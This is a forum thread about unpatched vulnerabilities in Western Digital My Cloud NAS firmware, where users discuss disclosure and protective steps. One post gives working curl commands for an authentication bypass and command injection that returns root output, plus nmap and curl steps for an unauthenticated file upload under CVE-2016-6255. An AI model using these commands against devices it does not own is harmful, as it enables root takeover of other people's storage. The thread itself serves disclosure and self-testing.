Latest firmware still vulnerable

I can only see the NAS being hit if a computer on the LAN spreads the worm to the NAS. If the SMB ports ate not forwarded to the Internet then the worm on the Internet will not be able to find the Samba service on the NAS on the LAN.

As long as you keep your LAN environment clean then it should not be a problem.

Hello
How do we get Twonky media to understand playlists made in iTunes?

Wrong thread. Not related to the firmware vulnerability issues being discussed in this topic. Suggest you either use the forum search feature, magnifying glass icon upper right, to see if your question has already been discussed. Or start a new discussion topic.

For example see the past discussions on iTunes Playlists and the My Cloud:
https://community.wd.com/search?q=twonky%20itunes%20playlist%20category%3A105

Also see the unofficial Twonky FAQ at this link:
https://community.wd.com/t/faq-twonky-dlna-media-server-setup-use/95373

1 Like

Thanks for the answer. I thought that the instruction was the disabling cloud access is not enough. If it the WD is on the network it is vulnerable.

Thoughts?
Can we get a Best Practices guide together?

I don’t know; I’m not a white hat security researcher. And, as I said, WD have not identified which of the nearly 100 vulnerabilites recently reported that they think they have fixed, and I’ve not seen any reports of white hats doing re-tests.

Best Practice guide? Sorry, I can’t help with that.

1 Like

Is there any more progress with this?
Or more information somewhere else?

I became aware of the issues here:
https://threatpost.com/unpatched-western-digital-bugs-leave-nas-boxes-open-to-attack/124125/

Who knows? WD aren’t telling us anything about what they’ve done to fix the raft of vulnerabilities identified.

There has been a firmware upgrade, but it gives no details of what specific CVE issues have been addressed.

WD really don’t seem to take security seriously; certainly not when communicating with customers about security concerns.

That article is from March 7th. WD released new firmware in April that was supposed to address “critical security vulnerabilities”.

Unless those organizations that reported (or someone on their own) the security vulnerabilities back in March retest the My Cloud units with the updated firmware to see if the holes have been patched we won’t know if they’ve really been patched.

https://community.wd.com/t/new-release-my-cloud-firmware-versions-4-05-00-315-2-30-165-4-19-17/202232

1 Like

Please. How downgrade fw. wd my cloud to 04.05.00-101.
After upgrading to the latest version, my hard drive does not sleep. Only a short time and he awakens in inactivity.

If one uses the forum search feature (magnifying glass icon upper right) they’ll find several past discussions on how to downgrade the single bay My Cloud to an earlier firmware version. Note however that downgrading to earlier firmware may increase the My Cloud vulnerability since it won’t have newer fixes or patches, the subject of this current discussion. Here is one such discussion on how to downgrade:

This issue isn’t really related to the subject of this discussion on the firmware being vulnerable to certain hacks. Again, use the forum search feature and search for “sleep” and you’ll find numerous discussions on how to try and deal with the single bay My Cloud when it doesn’t go into sleep mode. For example:

https://community.wd.com/search?q=sleep%20category%3A105

Thank you for answer. I’ll read.

FWIW the latest firmware update for the MyCloud Mirror 1st Gen currently says:

Resolved critical security vulnerabilities that potentially allowed unauthorized file deletion, unauthorized command execution and authentication bypass.

-> New Release - My Cloud Mirror Firmware Release 2.11.169 (01/12/18)

However there is still at least one vulnerability described in:

https://www.exploitee.rs/index.php/Western_Digital_MyCloud#network_mgr.cgi_.28added_8.2F6.2F2017.29

which exists in / affects the newest 2.11.168 firmware of the MyCloud Mirror 1st Gen. Maybe other Models / Generations are affected as well, you can easily test this on your own with a Linux based system and two simple curl calls showing the authentication bypass:

curl -i "http://IP/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1"
curl -i "http://IP/web/dsdk/DsdkProxy.php" --data "';id;'" --cookie "isAdmin=1;username=admin"

Just replace the admin in “username=admin” with a valid user and you’re getting the following response:

HTTP/1.1 200 OK
Date: Thu, 30 Nov 2017 12:39:20 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: application/json
Content-Language: en

<br />
<b>Warning</b>:  http_response_code() expects parameter 1 to be long, string given in <b>/usr/local/modules/web/pages/dsdk/DsdkProxy.php</b> on line <b>48</b><br />
uid=0(root) gid=0(root) groups=0(root)
sh: : Permission denied

which means that you’re again able to run arbitrary commands on the system as root.

Edit

At least the WD MyCloud Mirror 1st Generation with the latest firmware 2.11.168 (11/28/17) is vulnerable to the CVE-2016-6255 in libupnp listed here as well:

https://nvd.nist.gov/vuln/detail/CVE-2016-6255

This can be simple checked with the following steps to upload a file to the target device:

  1. Scan for the UPnP TCP port of the device:

nmap -p 49000-49999 IP

  1. Verify that the file doesn’t exist yet:

curl -i http://IP:49154/test123

(Use the previously found port)

  1. Upload a new file:

curl -i --data "uploadtest" http://IP:49154/test123

  1. Verify that the file exists:

curl -i http://IP:49154/test123

Side-note:

I would love to submit this to https://support.wdc.com/ as asked in some other threads but i’m not able to create an account there since a few days. It just says “registration failed” after submitting the registration form without giving ANY information why it failed.

If some one here has an account please go ahead and submit it.

Edit

It seems the second vulnerability is even known since more then a year:

this topic disscus the vulnerability for the MyCloud and not for My Cloud Mirror. These are different products, so they may have different update contents/software

That’s because this is the MyCloud forum, and NOT the Mirror forum…

And the firmware really isn’t very different, especially in the gen2/v2 version.

Exactly, that’s why i had pointed out in my initial post that my observations are from a MyCloud Mirror 1st Gen:

and that it might be possible that other models / generations are affected as well by those known / existing vulnerabilities:

And most stuff on the https://www.exploitee.rs wiki page seems to have been tested on a MyCloud EX2 but the MyCloud Mirror 1st Gen was affected by all vulnerabilities as well.

As the MyCloud Mirror Changelog is containing notes about fixed vulnerabilities, where not all known are fixed as shown above this might apply for the plain MyClouds as well. Thus i assume that the Changelogs can’t be trusted fully.

So if you’re on a MyCloud (which you’re obviously are based on this forum) you can verify the two posted vulnerabilities against your device. And if the device is still vulnerable the posts are fitting here (in the “Latest firmware still vulnerable thread”) as well.

1 Like

hi there,

Regardless of whether the vulnerabilities were closed with the latest updates, I would like to summarize for myself: what are the steps to protect yourself? So I update the firmware, it is firstly and for sure.
Disabling Cloud Access was also important. But what else can / must one do? On the router? On MyCloud device? In the dashoard? Disabling UpNp as I can remember?

can we summarize :thinking:
thanks

With new reports like:

http://gulftech.org/advisories/WDMyCloud%20Multiple%20Vulnerabilities/125

coming in i would suggest to fully disable remote access to the device and to prevent access by untrusted systems/users to the device from within your local network.

1 Like

It’s best to disconnect it from power supply, as a web page loaded in some device on a machine on the local network can exploit the backdoor just as well.

I find it hard to accept that this vulnerability should have been known to WD since June last year, and no fix has been provided. This is bad. The statements made by WD staff members in this thread (much earlier) about them taking security issues seriously sound pretty derisive.

Whew for once the first gen v4.x single bay units are not affected… :laughing:

Always a good suggestion in any event with or without a My Cloud device on the local network. If one is serious about their network security they’d restrict guest access and ensure guest systems are clean before being allowed to access the full local network. Otherwise confine those guests and their systems to a guest network that is blocked from being able to access the main local network where devices like the My Cloud reside. Most consumers however are not that anal (even if it’s good practice) about securing their local network and their devices (like the My Cloud).

Edit to add: It should be noted that the Gulftech.org vulnerability was against the 2.30.165 firmware. No word (at least i didn’t see it in the article) if the current v2.30.172 firmware released on 11/16/17 for the single bay My Cloud units is affected or if the vuln hole was closed.